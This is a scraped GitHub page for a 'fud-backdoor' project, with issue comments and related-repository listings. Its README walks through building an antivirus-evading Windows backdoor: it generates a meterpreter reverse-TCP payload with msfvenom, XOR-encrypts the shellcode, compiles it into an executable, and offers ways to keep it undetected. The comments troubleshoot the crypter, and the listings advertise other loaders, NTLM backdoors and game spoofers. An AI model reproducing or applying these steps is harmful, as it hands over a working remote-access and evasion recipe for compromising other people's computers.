Create a fully undetectable backdoor with simple steps.

Overview

πŸ”’ Generate FUD backdoor with a Python Crypter πŸ”’

Follow the steps bellow to generate a crypted shellcode that can be used on a C++ executable.

Clone the repository

sudo git clone https://github.com/3ct0s/fud-backdoor.git
cd fud-backdoor

Generate The ShellCode

msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=(IP) LPORT=(PORT) -f raw -o raw.txt

Encode the ShellCode With the XOR Encryption

python xor_encryptor.py raw.txt > xor_shellcode.txt

Add the crypted shellcode on main.cpp

Now that you have the encrypted shellcode you need to add it on the main.cpp file just like this:

char b[] = /*xor_shellcode*/

Compile the main.cpp file

There is no specific way to do this, all you need to do is compile the C++ code into a windows executable. Here are ways to do that. https://cutt.ly/BBOXP797

Execute the backdoor

Now you can execute the backdoor and enjoy the metepreter shell

What if it gets detected?

At some point, the anti viruses will be able to detect this backdoor. Here are some things you can do to make it undetectable again.

You can try to change the payload type protocol and make it http or https and make sure to use another port, add gibberish C++ code on the main.cpp file and you can also try playing with the SSL certificate of the session. Here is an article that covers this: https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation

If this still doesn't work, I can't think of another way to make the connection undetectable since this is a meterpreter shell and they get detected quite easily

DISCLAIMER

I am not responsible for any of your actions. This GitHub repository is made for educational purposes only!!!

Comments
  • not able to compile

    not able to compile

    Hey there, thank you for your work here! I did everything like you showed in your videotutorial and the latest repository here but im not able to compile the exe without errors. Not with c++dev and also not with visual studio...

    Any ideas? Did you missed some headers in the upload or something?

    opened by plumped 9
  • Code restructure/refactor

    Code restructure/refactor

    About the xor_encryptor.py:

    1. Combined and composed all the code into functions(Planning on making it Object-oriented).
    2. Fixed the TypeError that was occurring after ord() was called on the individual bytes in the data parameter of the xor function(may have been caused by the the way Python 3 was interpreting bytes because it was giving ord() function arguments of data type 'int' yet ord() works on individual characters of strings).
    3. Added more error handling around the code reading in the plain text bytes from the specified file at the command line.
    4. Improved execution time.

    About the main.cpp:

    1. Added a memory allocation check on the VirtualAlloc() return value to prevent unintended program crashes.
    2. Introduced a "key" variable to store the intended key/password to encrypt/decrypt during xoring of plain data
    3. Fixed the shell-code's data type from signed char to unsigned char since binaries are made of unsigned characters
    opened by winterrdog 5
  • Dont print so many messages and make code bit more readble

    Dont print so many messages and make code bit more readble

    What was done?

    I get that you are thankful for viewing the code but it is annoying both when reading and compiling the code to see 48 of messages one is enough. Also just made loop look more readable because. Loops are usually written this way so Idk its my personal preference.

    opened by Roko191 2
  • Improved the code

    Improved the code

    xor_encryptor.py:

    1. Refactored all the code that was responsible for xor encryption into an XorCipher class for easier porting into other programs and easier interface with the code.
    2. added text-wrapping to the output xor'd shell-code array.

    main.cpp:

    1. Just formatted the code nothing much( my text editor's default formatter caused it )
    2. Reserved and committed pages for the shell-code in one step, by calling VirtualAlloc() with MEM_COMMIT | MEM_RESERVE.

    You can also try to test the code on your end lemme know about what you may find. :)

    opened by winterrdog 0
  • ord() expected string of length 1, but int found

    ord() expected string of length 1, but int found

    Hello @3ct0s,

    I am studying to create Fully Undetectable backdoor, I found your repository. Thanks to your work, I could created 'raw.txt'. But, when I tried to create encrypted shellcode, python script complained like below.

    $ python xor_encryptor.py raw.txt > xor_shellcode.txt
    
    Traceback (most recent call last):
      File "/home/sflab/Documents/workspace/fud-backdoor/xor_encryptor.py", line 19, in <module>
        ciphertext = xor(plaintext, KEY)
      File "/home/sflab/Documents/workspace/fud-backdoor/xor_encryptor.py", line 10, in xor
        output_str += chr(ord(current) ^ ord(current_key))
    TypeError: ord() expected string of length 1, but int found
    

    Do you have any thought to resolve the issue?

    Thanks for your reply in advance.

    opened by meteoricfarm 6
Owner
Dimitris Kalopisis
Dimitris Kalopisis
a undetectable tool by modify odyssey, support sign disable & dylib injection, test on iphoneX(13.5.1 expolit by FreeTheSandbox), our qqgroup is 703156427

a undetectable ios root access tool by modify odyssey, support sign disable & dylib injection, test on iphoneX(13.5.1 expolit by FreeTheSandbox), our

null 58 Nov 22, 2021
Undetectable Loader for Cobalt Strike Using Syscalls And A External Shellcode

Hellsgate Undetectable Loader for Cobalt Strike Using Syscalls And A External Shellcode Features: Using Syscalls from Hellsgate tech loading the shell

JUICY 21 Nov 5, 2021
Header-only VMWare Backdoor API Implementation & Effortless VMX Patcher for Custom Guest-to-Host RPCs

VmxHijack Header-only VMWare Backdoor API Implementation & Effortless VMX Patcher for Custom Guest-to-Host RPCs Sample // --- RPC Server Code (VmxHija

null 27 Sep 9, 2022
Windows NTLM Authentication Backdoor

nosferatu Lsass NTLM Authentication Backdoor How it Works First, the DLL is injected into the lsass.exe process, and will begin hooking authentication

RITSEC Redteam 11 Nov 9, 2022
Create a calculator of any kind in any language, create a pr.

calculators Create a calculator of any kind in any language, create a pr. Create a calculator of any type using the programming language of your choic

Akshay Gautam 2 Oct 21, 2022
Simple, fully external, smart, fast, JSON-configurated, feature-rich Windows x86 DLL Memory Dumper with Code Generation. Written in Modern C++.

altdumper Simple, fully external, smart, fast, JSON-configurated, feature-rich Windows x86 DLL Memory Dumper with Code Generation. Written in Modern C

cristei 14 Sep 9, 2022
a playground for working with fully static tensors and automatic differentiation

This is a playground for learning about how to apply template-meta-programming to get more efficient evaluation for tensor-based automatic differentiation.

Edward Kmett 16 Mar 18, 2021
SMARTmBOT - a new, customizable, scalable, and fully opensource mobile robot platform

The goal of this repository is to introduce a new, customizable, scalable, and fully opensource mobile robot platform, called SMARTmBOT. This repository provides a guide, and all design files and source codes so that you can build your own SMARTmBOT. SMARTmBOT can be useful for studying the basics of robotics, especially mobile robotics. It can also be used to study advanced topics such as swarm robotics.

SMART Lab at Purdue University 39 Jan 2, 2023
A proposition for a fully intergrated kext for all Surface Pro hardwares

BigSurface The name comes from macOS Big Sur. Big Sur + Surface -> Big Surface (LOL) PS:If you have a better name, please let me know. A proposition f

null 174 Dec 31, 2022
An 8-bit minicomputer with a fully custom architecture

JDH-8 An fully custom 8-bit minicomputer with a unique architecture and the express goal of playing PONG. The program above is running in the emulator

jdh 1.1k Jan 3, 2023
Fully Featured Time Circuits Display from Back to the Future

Time Circuits Display This Time Circuits Display has been meticulously reproduced to be as accurate as possible to the one seen in the Delorean Time M

John 64 Dec 29, 2022
A loadlibrary injector for the game Splitgate that fully bypasses their EQU8 anti-cheat implementation.

splitgate-load-library-injector A loadlibrary injector for the game Splitgate that fully bypasses their EQU8 anti-cheat implementation. Information Th

Hinnie 8 Oct 3, 2022
Fully resizing juce peak meter module with optional fader overlay.

Sound Meter Juce peak meter module with optional fader overlay. by Marcel Huibers | Sound Development 2021 | Published under the MIT License Features:

Sound Development 17 Nov 22, 2022
Fully reverse engineered source code of a pasted valorant spoofer called archine.

Archine Valorant Spoofer Fully reverse engineered source code of a pasted valorant spoofer called archine. Please do not buy archine spoofer, the owne

null 13 Feb 18, 2022
RISC-V has a 128-bit ISA that is fairly developed, but not standardized fully yet.

128-bit RISC-V assembler RISC-V has a 128-bit ISA that is fairly developed, but not standardized fully yet. I am maintaining a RISC-V userspace emulat

Alf-AndrΓ© Walla 39 Nov 20, 2022
A fully-featured, cross platform XO-CHIP/S-CHIP/CHIP-8 emulator written in C and SDL.

JAXE (Just Another XO-CHIP/CHIP-8 Emulator) Brix Space Invaders (In Debug Mode) Black Rainbow DVN8 Super Neat Boy Chicken Scratch CHIP-8 was a virtual

Kurtis Dinelle 21 Nov 12, 2022
A fully customisable assembler for your own instruction sets

CASM A fully customisable assembler for your own instruction sets! What Is CASM? ?? Documentation ?? Command-Line Usage ?? How To Install CASM ?? Buil

Sjoerd Vermeulen 2 May 7, 2022
A fully-functional open source and open hardware mechanical USB computer keyboard with only three keys!

threeboard threeboard is a fully-functional open source and open hardware mechanical USB computer keyboard with only three keys. It supports multiple

Conor Taylor 98 Dec 9, 2022
This is the second genereation of my fully opensource Spacemouse called SpaceRat

SpaceRat This is the second genereation of my fully opensource Spacemouse called SpaceRat. With the help of this you can navigate in your 3D CAD softw

null 255 Jan 1, 2023